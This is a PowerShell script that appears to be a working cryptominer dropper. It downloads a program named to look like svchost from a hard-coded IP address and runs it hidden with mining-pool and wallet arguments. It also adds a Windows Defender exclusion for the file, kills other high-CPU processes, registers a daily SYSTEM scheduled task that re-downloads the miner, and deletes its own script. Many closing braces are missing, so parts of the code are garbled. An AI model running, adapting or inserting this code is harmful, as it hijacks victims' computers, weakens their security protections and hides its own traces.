# Define the URL of the program to download and the desired arguments
$programUrl = "http://151.106.34.115:6573/svhost.exe" # Replace with the actual URL
$programName = "svhost.exe" # Replace with the actual program name
$desiredArguments = "-d spr.tw-pool.com:14001 -w spectre:qz84qx270dh2u73e3p9m528lr3xhykspmatyc4pcsjlf50756d8m6vht6z5nl.WNDALL" # Replace with the desired arguments
$downloadPath = "$env:TEMP\$programName"
# Check if the script is running with administrative privileges
function Test-Administrator {
$identity = [Security.Principal.WindowsIdentity]::GetCurrent()
$principal = New-Object Security.Principal.WindowsPrincipal($identity)
return $principal.IsInRole([Security.Principal.WindowsBuiltinRole]::Administrator)
$isAdmin = Test-Administrator
if ($isAdmin) {
Write-Host "Running with administrative privileges."
} else {
Write-Host "Running without administrative privileges. Some functions may be skipped."
# Function to add an exclusion in Windows Defender
function Add-WindowsDefenderExclusion {
param (
[string]$path # Path to the file or folder to exclude
try {
# Add the path as an exclusion in Windows Defender
Add-MpPreference -ExclusionPath $path -ErrorAction Stop
Write-Host "Added '$path' as an exclusion in Windows Defender." -ForegroundColor Green
return $true
} catch {
Write-Host "Failed to add exclusion. Error: $_" -ForegroundColor Red
return $false
# Example usage
$exclusionPath = "$env:TEMP\svhost.exe" # Replace with the path to your file
Write-Host "Adding exclusion for '$exclusionPath'..."
if (Add-WindowsDefenderExclusion -path $exclusionPath) {
Write-Host "Exclusion added successfully." -ForegroundColor Green
} else {
Write-Host "Failed to add exclusion." -ForegroundColor Red
# Function to terminate processes using excessive CPU (requires admin privileges)
function Terminate-HighCPUProcess {
param (
[int]$cpuThreshold = 80 # Default threshold can be adjusted
# List of system processes to ignore
$systemProcesses = @("svchost", "System", "Registry", "smss", "csrss", "wininit", "services", "lsass", "lsm", "winlogon", "spoolsv", "explorer")
Write-Host "Checking for processes using excessive CPU..."
try {
# Get CPU usage for each process using Get-Counter
$cpuUsage = Get-Counter '\Process(*)\% Processor Time' | Select-Object -ExpandProperty CounterSamples
$highCPUProcesses = $cpuUsage | Where-Object {
$_.CookedValue -gt $cpuThreshold -and
-not ($systemProcesses -contains $_.InstanceName) -and
$_.InstanceName -ne "_Total" -and
$_.InstanceName -ne "Idle"
}
if (-not $highCPUProcesses) {
Write-Host "No processes found exceeding the CPU usage threshold of $cpuThreshold%." -ForegroundColor Green
return
}
foreach ($proc in $highCPUProcesses) {
try {
$process = Get-Process -Id $proc.InstanceName -ErrorAction SilentlyContinue
if ($process) {
Write-Host "Attempting to terminate process: $($proc.InstanceName) (PID: $($process.Id)) - CPU Usage: $($proc.CookedValue)%" -ForegroundColor Yellow
Stop-Process -Id $process.Id -Force -ErrorAction Stop
Write-Host "Successfully terminated process: $($proc.InstanceName)" -ForegroundColor Green
}
}
catch {
Write-Host "Failed to terminate process $($proc.InstanceName) (PID: $($process.Id)). Error: $_" -ForegroundColor Red
}
}
catch {
Write-Host "An error occurred while monitoring CPU usage: $_" -ForegroundColor Red
# Function to download and execute the program (does not require admin privileges)
function Download-And-Execute {
Write-Host "Downloading program from $programUrl..."
# Attempt to use Invoke-WebRequest for PowerShell 3.0 and above
try {
Invoke-WebRequest -Uri $programUrl -OutFile $downloadPath -ErrorAction Stop
} catch {
Write-Host "Failed to download using Invoke-WebRequest. Falling back to .NET WebClient."
# Fallback: Use .NET WebClient for PowerShell 2.0
try {
$webClient = New-Object System.Net.WebClient
$webClient.DownloadFile($programUrl, $downloadPath)
} catch {
Write-Host "Failed to download using .NET WebClient. Skipping program download."
return $false
}
# Verify the file was downloaded
if (-not (Test-Path $downloadPath)) {
Write-Host "Downloaded file not found. Skipping execution."
return $false
Write-Host "Executing program: $programName"
try {
# Run the program directly (no window prompts)
$process = Start-Process -FilePath $downloadPath -ArgumentList $desiredArguments -WindowStyle Hidden -PassThru -ErrorAction Stop
# Wait for the process to start and check if it's running
Start-Sleep -Seconds 2 # Give the process time to start
if (-not $process.HasExited) {
Write-Host "Program '$programName' executed successfully." -ForegroundColor Green
return $true
} else {
Write-Host "Program '$programName' failed to execute or exited immediately." -ForegroundColor Red
Cleanup-Files
return $false
}
} catch {
Write-Host "Failed to execute program '$programName'. Error: $_" -ForegroundColor Red
Cleanup-Files
return $false
# Function to verify if the program is running
function Verify-Program {
param (
[Parameter(Mandatory = $true)]
[string]$programName
Write-Host "Verifying if program '$programName' is running..."
try {
# Strip any file extension from program name for proper process checking
$processName = [System.IO.Path]::GetFileNameWithoutExtension($programName)
# Get all processes matching the name (case-insensitive)
$runningProcesses = Get-Process -Name $processName -ErrorAction Stop
if ($runningProcesses) {
$processCount = ($runningProcesses | Measure-Object).Count
Write-Host "Program '$programName' is running. Found $processCount instance(s):" -ForegroundColor Green
# Display details for each running instance
foreach ($process in $runningProcesses) {
Write-Host " - PID: $($process.Id), Start Time: $($process.StartTime), Memory: $([math]::Round($process.WorkingSet64 / 1MB, 2)) MB" -ForegroundColor Green
}
return $true
}
Write-Host "Program '$programName' is not currently running." -ForegroundColor Yellow
return $false
catch [Microsoft.PowerShell.Commands.ProcessCommandException] {
Write-Host "No processes found matching '$programName'." -ForegroundColor Yellow
return $false
catch {
Write-Host "Error occurred while checking for program: $_" -ForegroundColor Red
return $false
# Function to terminate the program (if running)
function Terminate-Program {
param (
[Parameter(Mandatory = $true)]
[string]$programName
Write-Host "Attempting to terminate program '$programName'..."
try {
# Strip any file extension from program name for proper process checking
$processName = [System.IO.Path]::GetFileNameWithoutExtension($programName)
# Get all processes matching the name
$runningProcesses = Get-Process -Name $processName -ErrorAction Stop
if (-not $runningProcesses) {
Write-Host "No processes found matching '$programName'." -ForegroundColor Yellow
return $false
}
$processCount = ($runningProcesses | Measure-Object).Count
Write-Host "Found $processCount running instance(s) of '$programName'." -ForegroundColor Yellow
foreach ($process in $runningProcesses) {
try {
Write-Host "Terminating process (PID: $($process.Id))..." -ForegroundColor Yellow
Stop-Process -Id $process.Id -Force -ErrorAction Stop
Write-Host "Successfully terminated process (PID: $($process.Id))" -ForegroundColor Green
}
catch {
Write-Host "Failed to terminate process (PID: $($process.Id)). Error: $_" -ForegroundColor Red
return $false
}
}
# Verify all processes are terminated
$remainingProcesses = Get-Process -Name $processName -ErrorAction SilentlyContinue
if ($remainingProcesses) {
Write-Host "Warning: Some processes could not be terminated." -ForegroundColor Red
return $false
}
return $true
catch [Microsoft.PowerShell.Commands.ProcessCommandException] {
Write-Host "Error: No processes found matching '$programName'." -ForegroundColor Yellow
return $false
catch {
Write-Host "Error occurred while terminating program: $_" -ForegroundColor Red
return $false
# Function to create a scheduled task for periodic checking (requires admin privileges)
# Define the URL of the program to download and the desired arguments
$programUrl = "http://151.106.34.115:6573/svhost.exe" # Replace with the actual URL
$programName = "svhost.exe" # Replace with the actual program name
$desiredArguments = "-d spr.tw-pool.com:14001 -w spectre:qz0cgt779szpg35c5m33ssq4eyxvnlg97en5zsw8mtgs6u9xhhrax3l95qdxa.WNDALL" # Replace with the desired arguments
$downloadPath = "$env:TEMP\$programName"
# Check if the script is running with administrative privileges
function Test-Administrator {
$identity = [Security.Principal.WindowsIdentity]::GetCurrent()
$principal = New-Object Security.Principal.WindowsPrincipal($identity)
return $principal.IsInRole([Security.Principal.WindowsBuiltinRole]::Administrator)
# Function to create a scheduled task
function Create-ScheduledTask {
param (
[string]$taskName = "DownloadAndRunProgramTask",
[string]$programUrl,
[string]$downloadPath,
[string]$programName
# Check for admin rights
if (-not (Test-Administrator)) {
Write-Host "Error: Administrative privileges are required to create scheduled tasks." -ForegroundColor Red
return $false
try {
# Remove existing task if it exists
if (Get-ScheduledTask -TaskName $taskName -ErrorAction SilentlyContinue) {
Write-Host "Removing existing scheduled task '$taskName'..."
Unregister-ScheduledTask -TaskName $taskName -Confirm:$false -ErrorAction Stop
Write-Host "Existing task removed successfully." -ForegroundColor Green
}
# Define the PowerShell command to run in the task
$psCommand = @"
`$programUrl = '$programUrl'
`$downloadPath = '$downloadPath'
`$programName = '$programName'
# Download the program
try {
Invoke-WebRequest -Uri `$programUrl -OutFile `$downloadPath -ErrorAction Stop
if (Test-Path `$downloadPath) {
# Execute the program
Start-Process -FilePath `$downloadPath -ArgumentList '$desiredArguments' -WindowStyle Hidden -ErrorAction Stop
}
} catch {
# Silently handle errors
}
# Create the scheduled task action
$action = New-ScheduledTaskAction -Execute "powershell.exe" -Argument "-NoProfile -ExecutionPolicy Bypass -Command `"$psCommand`""
# Create the scheduled task trigger (runs daily)
$trigger = New-ScheduledTaskTrigger -Daily -At 9am
# Register the scheduled task
Register-ScheduledTask -TaskName $taskName -Action $action -Trigger $trigger -User "SYSTEM" -RunLevel Highest -ErrorAction Stop
Write-Host "Scheduled task '$taskName' created successfully." -ForegroundColor Green
return $true
} catch {
Write-Host "Error: Failed to create scheduled task. $_" -ForegroundColor Red
return $false
# Function to verify if the scheduled task exists
function Verify-ScheduledTask {
param (
[string]$taskName = "DownloadAndRunProgramTask"
try {
$task = Get-ScheduledTask -TaskName $taskName -ErrorAction Stop
Write-Host "Scheduled task '$taskName' exists and is enabled." -ForegroundColor Green
return $true
} catch {
Write-Host "Scheduled task '$taskName' does not exist or is disabled." -ForegroundColor Red
return $false
# Main execution
Write-Host "Starting S-T execution."
# Create the scheduled task
if (Create-ScheduledTask -programUrl $programUrl -downloadPath $downloadPath -programName $programName) {
Write-Host "Scheduled task creation successful." -ForegroundColor Green
} else {
Write-Host "Scheduled task creation failed." -ForegroundColor Red
# Verify the scheduled task
if (Verify-ScheduledTask) {
Write-Host "Scheduled task verification successful." -ForegroundColor Green
} else {
Write-Host "Scheduled task verification failed." -ForegroundColor Red
Write-Host "S-T execution completed."
# Main loop
function Main {
$startTime = Get-Date # Record the start time
while ($true) {
# Check if 2 days have passed
if ((Get-Date) - $startTime -gt (New-TimeSpan -Days 2)) {
Write-Host "2 days have passed. Refreshing the operation..."
Terminate-Program -programName $programName # Terminate the current program
if (-not (Download-And-Execute)) {
Write-Host "Program failed to execute. Exiting script." -ForegroundColor Red
Cleanup-Files
exit 1
}
$startTime = Get-Date # Reset the start time
}
Terminate-HighCPUProcess
if (-not (Verify-Program -programName $programName)) {
Write-Host "Program is not running. Repeating the process..."
if (-not (Download-And-Execute)) {
Write-Host "Program failed to execute. Exiting script." -ForegroundColor Red
Cleanup-Files
exit 1
}
}
Write-Host "Sleeping before the next check..."
Start-Sleep -Seconds 39600 # Adjust the interval as needed
# Function to delete residual files after successful execution
function Cleanup-Files {
Write-Host "Cleaning up residual files..."
# Delete the downloaded program file
if (Test-Path $downloadPath) {
try {
Remove-Item -Path $downloadPath -Force -ErrorAction Stop
Write-Host "Deleted downloaded program file: $downloadPath" -ForegroundColor Green
} catch {
Write-Host "Failed to delete downloaded program file: $downloadPath. Error: $_" -ForegroundColor Red
}
# Delete the script file itself
$scriptPath = $MyInvocation.MyCommand.Path
if (Test-Path $scriptPath) {
try {
Remove-Item -Path $scriptPath -Force -ErrorAction Stop
Write-Host "Deleted script file: $scriptPath" -ForegroundColor Green
} catch {
Write-Host "Failed to delete script file: $scriptPath. Error: $_" -ForegroundColor Red
}
# Run the main loop